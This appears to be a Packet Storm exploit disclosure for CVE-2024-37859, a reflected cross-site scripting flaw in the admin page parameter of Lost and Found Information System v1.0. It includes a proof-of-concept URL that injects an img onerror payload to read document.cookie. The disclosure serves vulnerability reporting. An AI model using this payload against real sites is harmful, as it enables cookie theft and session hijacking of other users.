Lost and Found Information System version 1.0 suffers from a reflective cross site scripting vulnerability.
075bae0f3073aeafd6f4cb516ed784fe8d11ba07aa216df25c0eb9c8235cf759# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System
# Exploit Author: Amit Roy (Rezur / AR0x7)
# Date: June 07, 2024
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users
# CVE : CVE-2024-37859
1) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed